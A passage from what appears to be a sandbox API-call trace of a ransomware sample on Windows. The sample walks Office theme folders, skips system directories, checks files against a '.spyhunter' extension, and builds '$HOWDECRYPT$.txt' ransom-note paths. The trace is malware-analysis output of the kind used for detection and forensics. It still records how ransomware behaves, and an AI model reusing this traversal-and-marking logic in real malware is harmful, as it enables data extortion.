(lpString="$Recycle.bin") returned 12 [0090.883] lstrcmpiW (lpString1="SKY.ELM", lpString2="System Volume Information") returned -1 [0090.883] lstrlenW (lpString="System Volume Information") returned 25 [0090.883] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM") returned 71 [0090.883] StrStrIW (lpFirst="SKY.ELM", lpSrch=".spyhunter") returned 0x0 [0090.883] lstrcmpW (lpString1="SKY.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.883] lstrcmpW (lpString1="SKY.ELM", lpString2="_uninstalling_.png") returned 1 [0090.883] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.ELM") returned 71 [0090.883] GetProcessHeap () returned 0x2c0000 [0090.883] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e128 [0090.883] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1340) returned 0x3824f8 [0090.883] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.883] lstrcmpiW (lpString1="SKY.INF", lpString2="Windows") returned -1 [0090.883] lstrlenW (lpString="Windows") returned 7 [0090.883] lstrcmpiW (lpString1="SKY.INF", lpString2="$Recycle.bin") returned 1 [0090.883] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.884] lstrcmpiW (lpString1="SKY.INF", lpString2="System Volume Information") returned -1 [0090.884] lstrlenW (lpString="System Volume Information") returned 25 [0090.884] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF") returned 71 [0090.884] StrStrIW (lpFirst="SKY.INF", lpSrch=".spyhunter") returned 0x0 [0090.884] lstrcmpW (lpString1="SKY.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.884] lstrcmpW (lpString1="SKY.INF", lpString2="_uninstalling_.png") returned 1 [0090.884] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\SKY.INF") returned 71 [0090.884] GetProcessHeap () returned 0x2c0000 [0090.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd0) returned 0x37e050 [0090.884] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1348) returned 0x3824f8 [0090.884] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.884] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.884] lstrlenW (lpString="Windows") returned 7 [0090.884] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.884] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.884] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.884] lstrlenW (lpString="System Volume Information") returned 25 [0090.884] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 76 [0090.884] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.884] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.884] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.884] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\THMBNAIL.PNG") returned 76 [0090.884] GetProcessHeap () returned 0x2c0000 [0090.884] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xda) returned 0x376ce8 [0090.884] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1350) returned 0x3824f8 [0090.885] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.885] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.885] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\$HOWDECRYPT$.txt") returned 80 [0090.885] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SKY\\$HOWDECRYPT$.txt") returned 80 [0090.885] GetProcessHeap () returned 0x2c0000 [0090.885] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe2) returned 0x3421d0 [0090.885] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1358) returned 0x3824f8 [0090.885] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.885] lstrcmpiW (lpString1="SLATE", lpString2="Windows") returned -1 [0090.885] lstrlenW (lpString="Windows") returned 7 [0090.885] lstrcmpiW (lpString1="SLATE", lpString2="$Recycle.bin") returned 1 [0090.885] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.885] lstrcmpiW (lpString1="SLATE", lpString2="System Volume Information") returned -1 [0090.885] lstrlenW (lpString="System Volume Information") returned 25 [0090.885] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE") returned 65 [0090.886] lstrcmpW (lpString1="SLATE", lpString2=".") returned 1 [0090.886] lstrcmpW (lpString1="SLATE", lpString2="..") returned 1 [0090.886] GetProcessHeap () returned 0x2c0000 [0090.886] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.886] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*") returned 67 [0090.886] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.906] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.906] lstrlenW (lpString="Windows") returned 7 [0090.906] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.906] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.906] lstrlenW (lpString="System Volume Information") returned 25 [0090.906] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\.") returned 67 [0090.906] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.906] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.906] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.906] lstrlenW (lpString="Windows") returned 7 [0090.906] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.906] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.906] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.907] lstrlenW (lpString="System Volume Information") returned 25 [0090.907] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\..") returned 68 [0090.907] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.907] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.907] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.907] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.907] lstrlenW (lpString="Windows") returned 7 [0090.907] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.907] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.907] lstrlenW (lpString="System Volume Information") returned 25 [0090.907] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 77 [0090.907] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.907] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.907] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.907] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\PREVIEW.GIF") returned 77 [0090.907] GetProcessHeap () returned 0x2c0000 [0090.907] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x380530 [0090.907] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1340) returned 0x3824f8 [0090.907] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.907] lstrcmpiW (lpString1="SLATE.ELM", lpString2="Windows") returned -1 [0090.907] lstrlenW (lpString="Windows") returned 7 [0090.907] lstrcmpiW (lpString1="SLATE.ELM", lpString2="$Recycle.bin") returned 1 [0090.907] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.907] lstrcmpiW (lpString1="SLATE.ELM", lpString2="System Volume Information") returned -1 [0090.907] lstrlenW (lpString="System Volume Information") returned 25 [0090.908] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM") returned 75 [0090.908] StrStrIW (lpFirst="SLATE.ELM", lpSrch=".spyhunter") returned 0x0 [0090.908] lstrcmpW (lpString1="SLATE.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.908] lstrcmpW (lpString1="SLATE.ELM", lpString2="_uninstalling_.png") returned 1 [0090.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.ELM") returned 75 [0090.908] GetProcessHeap () returned 0x2c0000 [0090.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346028 [0090.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1348) returned 0x3824f8 [0090.908] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.908] lstrcmpiW (lpString1="SLATE.INF", lpString2="Windows") returned -1 [0090.908] lstrlenW (lpString="Windows") returned 7 [0090.908] lstrcmpiW (lpString1="SLATE.INF", lpString2="$Recycle.bin") returned 1 [0090.908] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.908] lstrcmpiW (lpString1="SLATE.INF", lpString2="System Volume Information") returned -1 [0090.908] lstrlenW (lpString="System Volume Information") returned 25 [0090.908] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF") returned 75 [0090.908] StrStrIW (lpFirst="SLATE.INF", lpSrch=".spyhunter") returned 0x0 [0090.908] lstrcmpW (lpString1="SLATE.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.908] lstrcmpW (lpString1="SLATE.INF", lpString2="_uninstalling_.png") returned 1 [0090.908] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\SLATE.INF") returned 75 [0090.908] GetProcessHeap () returned 0x2c0000 [0090.908] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xd8) returned 0x346108 [0090.908] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1350) returned 0x3824f8 [0090.908] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.909] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.909] lstrlenW (lpString="Windows") returned 7 [0090.909] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.909] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.909] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.909] lstrlenW (lpString="System Volume Information") returned 25 [0090.909] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 78 [0090.909] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.909] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.909] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\THMBNAIL.PNG") returned 78 [0090.909] GetProcessHeap () returned 0x2c0000 [0090.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x380448 [0090.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1358) returned 0x3824f8 [0090.909] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.909] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.909] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\$HOWDECRYPT$.txt") returned 82 [0090.909] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SLATE\\$HOWDECRYPT$.txt") returned 82 [0090.909] GetProcessHeap () returned 0x2c0000 [0090.909] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe6) returned 0x3421d0 [0090.909] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1360) returned 0x3824f8 [0090.911] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.911] lstrcmpiW (lpString1="SONORA", lpString2="Windows") returned -1 [0090.911] lstrlenW (lpString="Windows") returned 7 [0090.911] lstrcmpiW (lpString1="SONORA", lpString2="$Recycle.bin") returned 1 [0090.911] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.911] lstrcmpiW (lpString1="SONORA", lpString2="System Volume Information") returned -1 [0090.911] lstrlenW (lpString="System Volume Information") returned 25 [0090.911] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA") returned 66 [0090.911] lstrcmpW (lpString1="SONORA", lpString2=".") returned 1 [0090.911] lstrcmpW (lpString1="SONORA", lpString2="..") returned 1 [0090.911] GetProcessHeap () returned 0x2c0000 [0090.911] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.912] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*") returned 68 [0090.912] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.929] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.929] lstrlenW (lpString="Windows") returned 7 [0090.929] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.929] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.929] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.929] lstrlenW (lpString="System Volume Information") returned 25 [0090.929] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\.") returned 68 [0090.929] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.929] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.930] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.930] lstrlenW (lpString="Windows") returned 7 [0090.930] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.930] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.930] lstrlenW (lpString="System Volume Information") returned 25 [0090.930] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\..") returned 69 [0090.930] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.930] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.930] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.930] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.930] lstrlenW (lpString="Windows") returned 7 [0090.930] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.930] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.930] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.930] lstrlenW (lpString="System Volume Information") returned 25 [0090.930] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 78 [0090.930] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.930] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.930] lstrcmpW (lpString1="PREVIEW.GIF", lpString2="_uninstalling_.png") returned 1 [0090.930] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\PREVIEW.GIF") returned 78 [0090.930] GetProcessHeap () returned 0x2c0000 [0090.930] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xde) returned 0x376dd0 [0090.930] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1358) returned 0x3824f8 [0090.931] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.931] lstrcmpiW (lpString1="SONORA.ELM", lpString2="Windows") returned -1 [0090.931] lstrlenW (lpString="Windows") returned 7 [0090.931] lstrcmpiW (lpString1="SONORA.ELM", lpString2="$Recycle.bin") returned 1 [0090.931] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.931] lstrcmpiW (lpString1="SONORA.ELM", lpString2="System Volume Information") returned -1 [0090.931] lstrlenW (lpString="System Volume Information") returned 25 [0090.931] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM") returned 77 [0090.931] StrStrIW (lpFirst="SONORA.ELM", lpSrch=".spyhunter") returned 0x0 [0090.931] lstrcmpW (lpString1="SONORA.ELM", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.931] lstrcmpW (lpString1="SONORA.ELM", lpString2="_uninstalling_.png") returned 1 [0090.931] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.ELM") returned 77 [0090.931] GetProcessHeap () returned 0x2c0000 [0090.931] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x376eb8 [0090.931] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1360) returned 0x3824f8 [0090.931] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.931] lstrcmpiW (lpString1="SONORA.INF", lpString2="Windows") returned -1 [0090.931] lstrlenW (lpString="Windows") returned 7 [0090.931] lstrcmpiW (lpString1="SONORA.INF", lpString2="$Recycle.bin") returned 1 [0090.931] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.931] lstrcmpiW (lpString1="SONORA.INF", lpString2="System Volume Information") returned -1 [0090.931] lstrlenW (lpString="System Volume Information") returned 25 [0090.931] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF") returned 77 [0090.931] StrStrIW (lpFirst="SONORA.INF", lpSrch=".spyhunter") returned 0x0 [0090.931] lstrcmpW (lpString1="SONORA.INF", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.932] lstrcmpW (lpString1="SONORA.INF", lpString2="_uninstalling_.png") returned 1 [0090.932] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\SONORA.INF") returned 77 [0090.932] GetProcessHeap () returned 0x2c0000 [0090.932] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xdc) returned 0x376fa0 [0090.932] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1368) returned 0x3824f8 [0090.932] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.932] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="Windows") returned -1 [0090.932] lstrlenW (lpString="Windows") returned 7 [0090.932] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="$Recycle.bin") returned 1 [0090.932] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.936] lstrcmpiW (lpString1="THMBNAIL.PNG", lpString2="System Volume Information") returned 1 [0090.936] lstrlenW (lpString="System Volume Information") returned 25 [0090.936] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 79 [0090.936] StrStrIW (lpFirst="THMBNAIL.PNG", lpSrch=".spyhunter") returned 0x0 [0090.936] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="$HOWDECRYPT$.txt") returned 1 [0090.936] lstrcmpW (lpString1="THMBNAIL.PNG", lpString2="_uninstalling_.png") returned 1 [0090.936] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\THMBNAIL.PNG") returned 79 [0090.936] GetProcessHeap () returned 0x2c0000 [0090.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe0) returned 0x377088 [0090.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1370) returned 0x3824f8 [0090.936] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0 [0090.936] FindClose (in: hFindFile=0x335fa0 | out: hFindFile=0x335fa0) returned 1 [0090.936] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\$HOWDECRYPT$.txt") returned 83 [0090.936] lstrlenW (lpString="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SONORA\\$HOWDECRYPT$.txt") returned 83 [0090.936] GetProcessHeap () returned 0x2c0000 [0090.936] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0xe8) returned 0x3421d0 [0090.936] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x8, Ptr=0x3824f8, Size=0x1378) returned 0x3824f8 [0090.938] FindNextFileW (in: hFindFile=0x335f60, lpFindFileData=0x298eff8 | out: lpFindFileData=0x298eff8) returned 1 [0090.938] lstrcmpiW (lpString1="SPRING", lpString2="Windows") returned -1 [0090.938] lstrlenW (lpString="Windows") returned 7 [0090.938] lstrcmpiW (lpString1="SPRING", lpString2="$Recycle.bin") returned 1 [0090.938] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.938] lstrcmpiW (lpString1="SPRING", lpString2="System Volume Information") returned -1 [0090.938] lstrlenW (lpString="System Volume Information") returned 25 [0090.938] wnsprintfW (in: pszDest=0x35f878, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING") returned 66 [0090.938] lstrcmpW (lpString1="SPRING", lpString2=".") returned 1 [0090.938] lstrcmpW (lpString1="SPRING", lpString2="..") returned 1 [0090.938] GetProcessHeap () returned 0x2c0000 [0090.939] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x8, Size=0x1003e) returned 0x2c10048 [0090.939] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*") returned 68 [0090.939] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\*", lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 0x335fa0 [0090.945] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0090.945] lstrlenW (lpString="Windows") returned 7 [0090.945] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0090.945] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.945] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0090.945] lstrlenW (lpString="System Volume Information") returned 25 [0090.945] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\.") returned 68 [0090.945] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0090.945] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.945] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0090.945] lstrlenW (lpString="Windows") returned 7 [0090.945] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0090.946] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.946] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0090.946] lstrlenW (lpString="System Volume Information") returned 25 [0090.946] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\..") returned 69 [0090.946] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0090.946] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0090.946] FindNextFileW (in: hFindFile=0x335fa0, lpFindFileData=0x298eca8 | out: lpFindFileData=0x298eca8) returned 1 [0090.946] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="Windows") returned -1 [0090.946] lstrlenW (lpString="Windows") returned 7 [0090.946] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="$Recycle.bin") returned 1 [0090.946] lstrlenW (lpString="$Recycle.bin") returned 12 [0090.946] lstrcmpiW (lpString1="PREVIEW.GIF", lpString2="System Volume Information") returned -1 [0090.946] lstrlenW (lpString="System Volume Information") returned 25 [0090.946] wnsprintfW (in: pszDest=0x2c10048, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\SPRING\\PREVIEW.GIF") returned 78 [0090.946] StrStrIW (lpFirst="PREVIEW.GIF", lpSrch=".spyhunter") returned 0x0 [0090.946] lstrcmpW 